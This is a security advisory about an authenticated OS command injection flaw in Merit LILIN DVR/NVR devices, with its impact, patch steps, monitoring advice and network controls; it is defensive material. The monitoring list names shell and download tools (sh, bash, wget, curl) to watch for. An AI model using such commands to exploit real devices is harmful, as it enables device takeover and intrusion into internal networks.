A high-severity OS command injection vulnerability has been identified in certain DVR/NVR models from Merit LILIN. This flaw allows an authenticated remote attacker to take full control of the affected security devices, potentially leading to the compromise of video surveillance data, disruption of security monitoring, and unauthorized access to the internal network.

The vulnerability exists within a component of the device's software that fails to properly sanitize user-supplied input before passing it to the underlying operating system. A remote attacker who has successfully authenticated to the device can submit specially crafted input containing arbitrary OS commands. These commands are then executed with the privileges of the application, which may be root or another high-privileged user, resulting in a complete compromise of the device.

This vulnerability is rated as High severity with a CVSS score of 8.8. Successful exploitation could lead to significant business disruption and security risks. An attacker could gain complete control over the affected DVR/NVR systems, resulting in a loss of confidentiality (viewing or exfiltrating sensitive video feeds), integrity (tampering with or deleting recordings), and availability (disabling the device and security monitoring). Since these devices are often connected to the internal network, a compromised system could serve as a pivot point for attackers to launch further attacks against other critical assets within the organization.

Immediate Action:

• Identify all affected DVR/NVR devices within the environment.
• Apply the security updates provided by the vendor to all identified devices immediately to patch the vulnerability.
• Review device access logs for any unauthorized or suspicious authentication events that may have occurred prior to patching.

Proactive Monitoring:

• Monitor device system logs for unusual or suspicious command executions, particularly those involving shell commands like sh, bash, wget, or curl.
• Analyze network traffic for unexpected outbound connections from the DVR/NVR devices to unknown external IP addresses.
• Implement enhanced logging and alerting for authentication failures and successful logins from untrusted network zones.

Compensating Controls:

• If immediate patching is not feasible, restrict network access to the device's management interface to a limited set of trusted IP addresses or a dedicated management VLAN.
• Ensure all administrative accounts on the devices use strong, unique passwords and multi-factor authentication, if available, to make the authentication prerequisite more difficult for an attacker to achieve.
• Place the devices on a segmented network, isolated from critical corporate resources, to limit the potential impact of a compromise.

Public Exploit Available: false

Given the high CVSS score of 8.8 and the potential for complete system compromise, this vulnerability presents a significant risk to the organization. While it is not currently listed on the CISA KEV list, it should be treated with high priority. We strongly recommend that the vendor-supplied patches be applied to all affected devices immediately. If patching cannot be performed right away, the compensating controls, especially network segmentation and access restriction, must be implemented without delay to reduce the attack surface and mitigate the risk of exploitation.